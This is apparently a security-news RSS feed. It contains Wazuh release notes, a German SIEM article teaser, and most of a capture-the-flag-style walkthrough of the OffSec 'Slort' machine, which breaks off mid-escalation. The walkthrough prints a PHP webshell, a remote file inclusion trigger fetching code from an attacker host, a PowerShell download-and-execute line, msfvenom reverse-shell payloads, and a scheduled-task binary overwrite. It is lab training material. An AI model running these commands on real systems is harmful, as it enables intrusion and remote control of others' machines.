<li>Merge 4.14.6 into 4.14.7 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4792934428" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37358" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37358/hovercard" href="https://github.com/wazuh/wazuh/pull/37358">#37358</a></li>
<li>Bump 5.0.0 branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4794415837" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37371" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37371/hovercard" href="https://github.com/wazuh/wazuh/pull/37371">#37371</a></li>
<li>Merge 4.14.7 into 5.0.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4793306985" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37360" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37360/hovercard" href="https://github.com/wazuh/wazuh/pull/37360">#37360</a></li>
<li>Migrate remaining CI artifacts to S3 for the 5.0.0 branch (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="454578666" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/3502" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/3502/hovercard" href="https://github.com/wazuh/wazuh/pull/3502">#3502</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4788864035" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37350" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37350/hovercard" href="https://github.com/wazuh/wazuh/pull/37350">#37350</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MARCOSD4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MARCOSD4">@MARCOSD4</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4539151411" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36518" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36518/hovercard" href="https://github.com/wazuh/wazuh/pull/36518">#36518</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ripdiegozz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ripdiegozz">@Ripdiegozz</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4505228985" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36357" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36357/hovercard" href="https://github.com/wazuh/wazuh/pull/36357">#36357</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Adman23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Adman23">@Adman23</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4580559348" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36750" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36750/hovercard" href="https://github.com/wazuh/wazuh/pull/36750">#36750</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jcorredor-spec/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jcorredor-spec">@jcorredor-spec</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4521476970" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36402" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36402/hovercard" href="https://github.com/wazuh/wazuh/pull/36402">#36402</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/wazuh/wazuh/compare/v5.0.0-beta2...v5.0.0-beta3"><tt>v5.0.0-beta2...v5.0.0-beta3</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh v4.14.6-rc2]]></title>
<description><![CDATA[Manager
Removed

Removed unused SSL/TLS transport option from cluster. (#35648)

Fixed

Improved message decompression handling in remoted. (#35773)
Improved agent name validation to reject names starting with dot. (#35833)
Fixed segfault in vulnerability scanner module shutdown when disabled. (#...]]></description>
<link>https://tsecurity.de/de/3624265/it-security-tools/wazuh-v4146-rc2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624265/it-security-tools/wazuh-v4146-rc2/</guid>
<pubDate>Thu, 25 Jun 2026 13:19:22 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Manager</h3>
<h4>Removed</h4>
<ul>
<li>Removed unused SSL/TLS transport option from cluster. (<a href="https://github.com/wazuh/wazuh/pull/35648" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35648/hovercard">#35648</a>)</li>
</ul>
<h4>Fixed</h4>
<ul>
<li>Improved message decompression handling in remoted. (<a href="https://github.com/wazuh/wazuh/pull/35773" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35773/hovercard">#35773</a>)</li>
<li>Improved agent name validation to reject names starting with dot. (<a href="https://github.com/wazuh/wazuh/pull/35833" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35833/hovercard">#35833</a>)</li>
<li>Fixed segfault in vulnerability scanner module shutdown when disabled. (<a href="https://github.com/wazuh/wazuh/pull/36011" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36011/hovercard">#36011</a>)</li>
<li>Fixed string buffer handling in version comparison function. (<a href="https://github.com/wazuh/wazuh/pull/36059" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36059/hovercard">#36059</a>)</li>
<li>Improved cluster file synchronization security. (<a href="https://github.com/wazuh/wazuh/pull/36060" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36060/hovercard">#36060</a>)</li>
<li>Improved cluster file synchronization error handling on invalid task identifiers. (<a href="https://github.com/wazuh/wazuh/pull/36129" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36129/hovercard">#36129</a>)</li>
<li>Improved cluster merged file parameter validation to prevent directory escape. (<a href="https://github.com/wazuh/wazuh/pull/36204" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36204/hovercard">#36204</a>)</li>
<li>Improved <code>tmp_file</code> path validation in cluster DAPI. (<a href="https://github.com/wazuh/wazuh/pull/36246" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36246/hovercard">#36246</a>)</li>
<li>Improved cluster non-merged file path validation during worker file processing. (<a href="https://github.com/wazuh/wazuh/pull/36296" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36296/hovercard">#36296</a>)</li>
<li>Improved cluster node name format validation in the hello handler. (<a href="https://github.com/wazuh/wazuh/pull/36460" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36460/hovercard">#36460</a>)</li>
<li>Fixed missing <code>agent.host.ip</code> in inventory documents when agent IP is empty. (<a href="https://github.com/wazuh/wazuh/pull/35475" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35475/hovercard">#35475</a>)</li>
<li>Fixed stale agent <code>synced</code> status after hot reload on cluster worker nodes. (<a href="https://github.com/wazuh/external-devel-requests/issues/6726" data-hovercard-type="issue" data-hovercard-url="/wazuh/external-devel-requests/issues/6726/hovercard">#6726</a>)</li>
</ul>
<h3>Agent</h3>
<h4>Fixed</h4>
<ul>
<li>Fixed agent registration not running on reinstall after <code>apt-get remove</code>. (<a href="https://github.com/wazuh/wazuh/pull/35727" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35727/hovercard">#35727</a>)</li>
<li>Fixed MS-Graph integration handling for relationships containing <code>/</code>. (<a href="https://github.com/wazuh/wazuh/pull/35431" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35431/hovercard">#35431</a>)</li>
<li>Fixed macOS syscollector to skip package receipts whose payload is no longer installed. (<a href="https://github.com/wazuh/wazuh/pull/35380" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35380/hovercard">#35380</a>)</li>
<li>Fixed missing eBPF create, modify and delete events on Ubuntu 24/26 and improved FIM whodata healthcheck. (<a href="https://github.com/wazuh/wazuh/pull/35838" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35838/hovercard">#35838</a>)</li>
<li>Hardened FIM database path lookups by migrating to parameterized SQL queries. (<a href="https://github.com/wazuh/wazuh/pull/36399" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36399/hovercard">#36399</a>)</li>
</ul>
<h3>RESTful API</h3>
<h4>Fixed</h4>
<ul>
<li>Escaped control characters in API usernames in access logs. (<a href="https://github.com/wazuh/wazuh/pull/35866" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35866/hovercard">#35866</a>)</li>
<li>Added input validation in cluster result handling and authentication. (<a href="https://github.com/wazuh/wazuh/pull/35757" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35757/hovercard">#35757</a>)</li>
<li>Fixed current user resolution in the <code>update-user</code> endpoint to enforce admin protection. (<a href="https://github.com/wazuh/wazuh/pull/35442" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35442/hovercard">#35442</a>)</li>
</ul>
<h3>Ruleset</h3>
<h4>Fixed</h4>
<ul>
<li>Updated rootcheck trojan signatures to avoid false positives on modern distributions (Debian 13, Ubuntu 26, Arch Linux). (<a href="https://github.com/wazuh/wazuh/pull/35927" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35927/hovercard">#35927</a>)</li>
</ul>
<h3>Other</h3>
<h4>Changed</h4>
<ul>
<li>Updated <code>cryptography</code>, <code>urllib3</code> and <code>python-multipart</code> Python dependencies. (<a href="https://github.com/wazuh/wazuh/pull/35982" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35982/hovercard">#35982</a>)</li>
<li>Updated eBPF libraries: <code>libbpf</code> to 1.7.0 and <code>bpftool</code> to 7.7.0. (<a href="https://github.com/wazuh/wazuh/pull/36467" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36467/hovercard">#36467</a>)</li>
</ul>
<h4>Fixed</h4>
<ul>
<li>Fixed <code>wazuh-manager</code> startup failure on RHEL 10 by dropping the <code>libcrypt</code> dependency from embedded Python. (<a href="https://github.com/wazuh/wazuh/pull/36782" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36782/hovercard">#36782</a>)</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[coverity-w26-4.14.6]]></title>
<description><![CDATA[Merge pull request #37010 from wazuh/task/37009-gha-codebuild-runners…]]></description>
<link>https://tsecurity.de/de/3618746/it-security-tools/coverity-w26-4146/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3618746/it-security-tools/coverity-w26-4146/</guid>
<pubDate>Tue, 23 Jun 2026 17:34:31 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Merge pull request <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4692373330" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37010" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37010/hovercard" href="https://github.com/wazuh/wazuh/pull/37010">#37010</a> from wazuh/task/37009-gha-codebuild-runners…</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security Monitoring im Mittelstand: Open Source vs. kommerzielle SIEM-Lösungen]]></title>
<description><![CDATA[NIS2, NISG 2026 und steigende Cyberrisiken zwingen den Mittelstand zum Handeln. Dieser Artikel analysiert, wann Open-Source-Plattformen wie Wazuh die bessere Wahl sind und wo kommerzielle SIEM-Lösungen punkten.

Tags: #Cyber Security | #NIS2 | #Open Source | #SIEM]]></description>
<link>https://tsecurity.de/de/3614429/it-security-nachrichten/security-monitoring-im-mittelstand-open-source-vs-kommerzielle-siem-loesungen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614429/it-security-nachrichten/security-monitoring-im-mittelstand-open-source-vs-kommerzielle-siem-loesungen/</guid>
<pubDate>Mon, 22 Jun 2026 05:37:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2024/08/SIEM-1920-Shuterstock-2414618713.jpg" class="attachment-full size-full wp-post-image" alt="SIEM" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2024/08/SIEM-1920-Shuterstock-2414618713.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2024/08/SIEM-1920-Shuterstock-2414618713-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2024/08/SIEM-1920-Shuterstock-2414618713-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2024/08/SIEM-1920-Shuterstock-2414618713-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2024/08/SIEM-1920-Shuterstock-2414618713-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="Security Monitoring im Mittelstand: Open Source vs. kommerzielle SIEM-Lösungen 1"></p>
    NIS2, NISG 2026 und steigende Cyberrisiken zwingen den Mittelstand zum Handeln. Dieser Artikel analysiert, wann Open-Source-Plattformen wie Wazuh die bessere Wahl sind und wo kommerzielle SIEM-Lösungen punkten.

<p>Tags: <a href="https://www.it-daily.net/thema/cyber-security">#Cyber Security</a> | <a href="https://www.it-daily.net/thema/nis2">#NIS2</a> | <a href="https://www.it-daily.net/thema/open-source">#Open Source</a> | <a href="https://www.it-daily.net/thema/siem">#SIEM</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Slort — RFI via PHP allow_url_include + Writable Scheduled Task Binary to Administrator | OffSec PG…]]></title>
<description><![CDATA[Slort — RFI via PHP allow_url_include + Writable Scheduled Task Binary to Administrator | OffSec PG PlaySlort is a Windows machine that chains a PHP remote file inclusion vulnerability with a world-writable scheduled task binary to deliver a full Administrator session. The web server on port 8080...]]></description>
<link>https://tsecurity.de/de/3606849/hacking/slort-rfi-via-php-allowurlinclude-writable-scheduled-task-binary-to-administrator-offsec-pg/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606849/hacking/slort-rfi-via-php-allowurlinclude-writable-scheduled-task-binary-to-administrator-offsec-pg/</guid>
<pubDate>Thu, 18 Jun 2026 08:51:11 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Slort — RFI via PHP allow_url_include + Writable Scheduled Task Binary to Administrator | OffSec PG Play</h3><p>Slort is a Windows machine that chains a PHP remote file inclusion vulnerability with a world-writable scheduled task binary to deliver a full Administrator session. The web server on port 8080 runs an XAMPP stack hosting a custom PHP application that passes the ?page= GET parameter directly into include() it with no sanitisation. With allow_url_include enabled — a dangerous PHP setting common in old XAMPP installations — pointing the parameter at an attacker-controlled URL causes the server to fetch and execute arbitrary PHP. That gets a Meterpreter shell as rupert. From there, standard automated enumeration turns up nothing. Manual filesystem exploration finds the answer: C:\Backup\info.txt documents a scheduled task invoked TFTP.EXE on a five-minute interval as Administrator. icacls confirms every authenticated user has full control over the binary. Replace it with a Meterpreter payload and wait for the scheduler to complete the chain.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*cFOBI7_c-J62tSPE1njH_g.png"></figure><p><strong>Attack Path:</strong> ffuf → /site/index.php?page= (RFI via allow_url_include) → Meterpreter as rupert → C:\Backup\TFTP.EXE (world-writable, scheduled as Administrator) → Meterpreter as SLORT\Administrator</p><p><strong>Platform:</strong> OffSec Proving Grounds Play<br> <strong>Machine:</strong> Slort<br> <strong>Difficulty:</strong> Intermediate<br> <strong>OS:</strong> Windows<br> <strong>Date:</strong> 20XX-XX-XX</p><h3>Table of Contents</h3><pre>1. Reconnaissance<br>   1.1  Nmap Port Scan — Fast Pass<br>   1.2  Nmap Port Scan — Full Range<br>   1.3  Dead-End Service Checks (FTP, SMB, MariaDB)<br>2. Web Enumeration<br>   2.1  Directory Busting — Port 8080<br>   2.2  Enumerating /site/<br>   2.3  Identifying the File Inclusion Parameter<br>3. Initial Access — RFI via PHP allow_url_include<br>   3.1  Confirming LFI via Path Traversal<br>   3.2  Confirming RFI and Deploying a PHP Webshell<br>   3.3  Upgrading to an Interactive Meterpreter Session<br>4. Post-Exploitation Enumeration<br>   4.1  Token Privileges<br>   4.2  Group Membership<br>   4.3  Auto-Starting Services<br>   4.4  Scheduled Tasks<br>   4.5  Registry Run Keys<br>   4.6  Manual Filesystem Exploration — C:\Backup<br>5. Privilege Escalation — Writable Scheduled Task Binary<br>   5.1  Confirming Write Access with icacls<br>   5.2  Generating the Replacement Payload<br>   5.3  Overwriting TFTP.EXE<br>   5.4  Catching the Administrator Session<br>6. Proof of Compromise<br>7. Vulnerability Summary<br>8. Defense &amp; Mitigation<br>   8.1  Remote File Inclusion — PHP allow_url_include Enabled<br>   8.2  User Input Passed to include() Without Sanitisation<br>   8.3  World-Writable Scheduled Task Binary</pre><h3>1. Reconnaissance</h3><h3>1.1 Nmap Port Scan — Fast Pass</h3><pre>nmap -Pn -sC -sV -F &lt;TARGET_IP&gt;</pre><p><strong>Results:</strong></p><pre>Port      State  Service   Version<br>--------  -----  --------  -------------------------------------------------<br>21/tcp    open   FTP       FileZilla 0.9.41 beta<br>135/tcp   open   msrpc     Microsoft Windows RPC<br>139/tcp   open   netbios   Microsoft Windows netbios-ssn<br>445/tcp   open   SMB       Microsoft Windows SMB (signing not required)<br>3306/tcp  open   mysql     MariaDB — unauthorized (local connections only)<br>8080/tcp  open   HTTP      Apache 2.4.43, PHP 7.4.6, OpenSSL 1.1.1g (Win64 XAMPP)</pre><p>The port 8080 finding is the most significant. XAMPP is a self-contained PHP development stack — the combination of Apache, PHP, MySQL, and sometimes phpMyAdmin — and old versions are known to ship with dangerous default settings, such as allow_url_include enabled. MariaDB is reachable on 3306, but the banner says "host not allowed", meaning it is accepting local connections only. SMB message signing is not required, which is noted for completeness. FTP is running a very old FileZilla beta — worth probing for anonymous login before moving on.</p><h3>1.2 Nmap Port Scan — Full Range</h3><pre>nmap -Pn -p- --min-rate 5000 &lt;TARGET_IP&gt;</pre><p><strong>Additional ports found:</strong></p><pre>49665/tcp  open  msrpc<br>49666/tcp  open  msrpc</pre><p>Both are ephemeral Windows RPC ports assigned dynamically at startup. They provide no additional attack surface here. The full scan confirms that the fast pass covered the meaningful services.</p><h3>1.3 Dead-End Service Checks</h3><p>Three quick checks before committing to the web server:</p><pre>ftp &lt;TARGET_IP&gt;<br># Username: anonymous<br># Password: anonymous</pre><p>Anonymous FTP login was rejected. FileZilla 0.9.41 beta is an old version, but anonymous access was not enabled on this instance.</p><pre>smbclient -L //&lt;TARGET_IP&gt; -N</pre><pre>NT_STATUS_ACCESS_DENIED</pre><p>Null session authentication is blocked. No SMB shares are enumerable without credentials.</p><pre>mysql -h &lt;TARGET_IP&gt; -u root --password=''</pre><p>Connection refused — MariaDB is bound to localhost only, consistent with the Nmap banner. XAMPP’s default MariaDB configuration does not expose the database externally, and that default was not changed here.</p><p>All three dead ends confirmed in under two minutes. Port 8080 is the target.</p><h3>2. Web Enumeration</h3><h3>2.1 Directory Busting — Port 8080</h3><pre>ffuf -u http://&lt;TARGET_IP&gt;:8080/FUZZ \<br>     -w /usr/share/seclists/Discovery/Web-Content/common.txt \<br>     -mc 200,301,302,403 -t 40</pre><p><strong>Results:</strong></p><pre>Path          Status  Notes<br>-----------   ------  ----------------------------------------<br>/site         301     Custom application<br>/phpmyadmin   403     Installed but access restricted<br>/dashboard    301     Default XAMPP dashboard</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/988/1*A00HueMeJfRO72kWjG5VJA.png"></figure><p>/site/ is the non-standard result. phpMyAdmin is present and blocked from external access — a useful note if credentials surface later. The XAMPP dashboard is the default content. Everything that matters is in /site/.</p><h3>2.2 Enumerating /site/</h3><pre>ffuf -u http://&lt;TARGET_IP&gt;:8080/site/FUZZ \<br>     -w /usr/share/seclists/Discovery/Web-Content/common.txt \<br>     -mc 200,301,302,403 -t 40</pre><p><strong>Results:</strong></p><pre>Path        Status  Size   Notes<br>----------  ------  -----  ------------------------------------------<br>admin.php   200     3998   Present<br>controllers 200     984    Application MVC structure<br>css         301     —      Static assets<br>fonts       301     —      Static assets<br>images      301     —      Static assets<br>index.php   301     27     Tiny body — redirect script<br>js          301     —      Static assets</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/919/1*yqYhMYXjCEv4psp5eszy9g.png"></figure><p>index.php returning a 301 with only 27 bytes in the response body is the key finding. That response size is consistent with a PHP script containing nothing but a header("Location: ...") redirect — the entire file is a single redirect, and it is almost certainly redirecting to itself with a ?page= parameter appended. That is the classic signature of a file inclusion handler.</p><h3>2.3 Identifying the File Inclusion Parameter</h3><pre>curl -I http://&lt;TARGET_IP&gt;:8080/site/index.php</pre><p><strong>Response header:</strong></p><pre>HTTP/1.1 301 Moved Permanently<br>Location: index.php?page=main.php</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/830/1*rbGwMu5xXqNP57_HpxpBSA.png"></figure><p>Confirmed. The application uses ?page= to determine which PHP file to include. The redirect destination is main.php, meaning the application's logic is to include whatever file is named in the page parameter. If that parameter is passed unsanitised into PHP's include(), it is a file inclusion vulnerability. The next step is confirming how far it can be pushed.</p><h3>3. Initial Access — RFI via PHP allow_url_include</h3><h3>3.1 Confirming LFI via Path Traversal</h3><pre>curl "http://&lt;TARGET_IP&gt;:8080/site/index.php?page=../../../../windows/system32/drivers/etc/hosts"</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/918/1*afnt8HGDVvqAaOwZaahBMw.png"></figure><p><strong>Output:</strong> The Windows hosts file content was returned verbatim in the response body.</p><p>LFI is confirmed. The application passes $_GET['page'] directly into include() with no path restriction and no input sanitisation. The web root sits at C:\xampp\htdocs\site\, so four levels of ../ traversal climb to the filesystem root, and the hosts file path resolves cleanly from there.</p><p>LFI alone enables arbitrary file reads — configuration files, credential stores, source code. The more powerful technique is RFI: if PHP’s allow_url_include directive is enabled, include() can fetch and execute code from a remote URL entirely under attacker control.</p><h3>3.2 Confirming RFI and Deploying a PHP Webshell</h3><p>Create a minimal PHP webshell locally:</p><pre>echo '&lt;?php system($_GET["cmd"]); ?&gt;' &gt; ~/cmd.php</pre><p>Serve it over HTTP from the attacker's machine:</p><pre>python3 -m http.server 8000</pre><p>Trigger remote inclusion and confirm RCE:</p><pre>curl "http://&lt;TARGET_IP&gt;:8080/site/index.php?page=http://&lt;ATTACKER_IP&gt;:8000/cmd.php&amp;cmd=whoami"</pre><p><strong>Output:</strong></p><pre>slort\rupert</pre><p>RFI confirmed. allow_url_include is enabled on this XAMPP installation. PHP fetched cmd.php from the attacker's machine, executed it as server-side code, and ran whoami via system(), and returned the result. Remote code execution as rupert is established.</p><blockquote><em>💡 </em><em>allow_url_include was deprecated in PHP 7.4 and removed in PHP 8.0. Its presence here on PHP 7.4.6 confirms this is an unmaintained, default XAMPP installation where the dangerous default was never corrected.</em></blockquote><h3>3.3 Upgrading to an Interactive Meterpreter Session</h3><p>A webshell requires a separate HTTP request for every command and leaves a log entry for every action. An interactive reverse shell provides a persistent, stateful terminal session.</p><p>Generate a stageless Windows Meterpreter payload:</p><pre>msfvenom -p windows/x64/meterpreter_reverse_tcp \<br>     LHOST=&lt;ATTACKER_IP&gt; LPORT=4444 \<br>     -f exe -o shell.exe</pre><p>A <strong>stageless</strong> payload (meterpreter_reverse_tcp) embeds the full Meterpreter agent in a single executable. A <strong>staged</strong> payload (meterpreter/reverse_tcp) sends a small stager first, which then downloads the agent in a second connection. Stageless is more reliable — one connection, full functionality from the moment it lands. If the second connection of a staged payload is interrupted by a firewall or timing issue, the session is lost.</p><p>Serve the payload and set up the Metasploit handler:</p><pre># Metasploit handler<br>use exploit/multi/handler<br>set payload windows/x64/meterpreter_reverse_tcp<br>set LHOST &lt;ATTACKER_IP&gt;<br>set LPORT 4444<br>run</pre><p>Deliver the payload via the webshell using a base64-encoded PowerShell command. Base64 encoding the entire PowerShell command with -enc sidesteps character escaping issues that arise when special characters — quotes, semicolons, dollar signs, pipes — must survive intact through URL encoding, PHP's system(), and PowerShell's own parser. A single base64 token collapses all of that complexity.</p><pre># Generate the base64-encoded download-and-execute command<br>powershell -c "IEX((New-Object Net.WebClient).DownloadString('http://&lt;ATTACKER_IP&gt;:8000/shell.exe'))"<br># Base64-encode the above in UTF-16LE for PowerShell -enc</pre><p>Trigger via the webshell:</p><pre>curl "http://&lt;TARGET_IP&gt;:8080/site/index.php?page=http://&lt;ATTACKER_IP&gt;:8000/cmd.php&amp;cmd=powershell+-enc+&lt;BASE64_PAYLOAD&gt;"</pre><p><strong>Meterpreter session received:</strong></p><pre>meterpreter &gt; getuid<br>Server username: SLORT\rupert</pre><p>Interactive session as rupert. Standard post-exploitation enumeration follows.</p><h3>4. Post-Exploitation Enumeration</h3><h3>4.1 Token Privileges</h3><pre>whoami /priv</pre><p>Only default low-privilege user rights are present. There is no SeImpersonatePrivilege, SeDebugPrivilege, or SeBackupPrivilege. The fast paths — PrintSpoofer, GodPotato, or token impersonation attacks — are not available here.</p><h3>4.2 Group Membership</h3><pre>whoami /groups</pre><p>rupert is a member of the standard user groups only: Everyone, Users, and Authenticated Users. No Administrators, Backup Operators, Remote Management Users, or Remote Desktop Users membership. No group-based escalation path.</p><h3>4.3 Auto-Starting Services</h3><pre>wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"</pre><p>Only VMware Tools services returned, all with properly quoted executable paths. No unquoted service path vulnerabilities, and no third-party service binaries to check for weak ACLs.</p><h3>4.4 Scheduled Tasks</h3><pre>schtasks /query /fo LIST /v | findstr /i "task name\|run as\|status"</pre><p>Only standard Windows system maintenance tasks. No custom tasks with writable executables or elevated execution contexts visible through automated enumeration.</p><h3>4.5 Registry Run Keys</h3><pre>reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run<br>reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><p>Only VMware Tools and Windows Security Health entries in both keys. No custom or administrator-added run key entries.</p><h3>4.6 Manual Filesystem Exploration — C:\Backup</h3><p>Automated enumeration produced nothing. Manual exploration of non-standard directories is the next step — anything outside C:\Windows\ and C:\Program Files\ that an administrator created deliberately is worth reading.</p><pre>dir C:\Backup</pre><pre>TFTP.EXE<br>info.txt</pre><pre>type C:\Backup\info.txt</pre><p><strong>Output:</strong></p><pre>Run every 5 minutes:<br>C:\Backup\TFTP.EXE -i &lt;REMOTE_HOST&gt; get backup.txt</pre><p>A scheduled task invoking TFTP.EXE on a five-minute interval to pull a backup file from a remote host. Two questions determine whether this is exploitable: what account runs this task, and whether the binary is writable by rupert?</p><blockquote><em>💡 Automated scripts follow predefined patterns. </em><em>C:\Backup is not part of any default Windows installation — an administrator created it and placed files there deliberately. Non-standard directories created by administrators are consistently worth manual inspection.</em></blockquote><h3>5. Privilege Escalation — Writable Scheduled Task Binary</h3><h3>5.1 Confirming Write Access with icacls</h3><pre>icacls C:\Backup\TFTP.EXE</pre><p><strong>Output:</strong></p><pre>C:\Backup\TFTP.EXE  BUILTIN\Users:(I)(F)<br>                    NT AUTHORITY\SYSTEM:(I)(F)<br>                    BUILTIN\Administrators:(I)(F)</pre><p>BUILTIN\Users:(I)(F) — Every authenticated user on the system has inherited full control over this file. (F) means full control: read, write, execute, delete, and permission modification. (I) means the permission was inherited from the parent directory's ACL rather than set explicitly on the file itself. rupert is a member of BUILTIN\Users. The binary can be overwritten entirely.</p><p>The account that runs the scheduled task is Administrator. Replacing the binary with a Meterpreter payload means the next time the scheduler fires, it executes the payload as Administrator — a direct path to a privileged session.</p><h3>5.2 Generating the Replacement Payload</h3><pre>msfvenom -p windows/x64/meterpreter_reverse_tcp \<br>     LHOST=&lt;ATTACKER_IP&gt; LPORT=7777 \<br>     -f exe -o tftp.exe</pre><p>Port 7777 is used to keep this listener separate from the existing session on port 4444. The output file is named tftp.exe to match the original binary — while the filename does not affect execution, it keeps the operation clean and avoids any hypothetical filename-based integrity checks.</p><p>Set up a second Metasploit handler:</p><pre>use exploit/multi/handler<br>set payload windows/x64/meterpreter_reverse_tcp<br>set LHOST &lt;ATTACKER_IP&gt;<br>set LPORT 7777<br>run</pre><h3>5.3 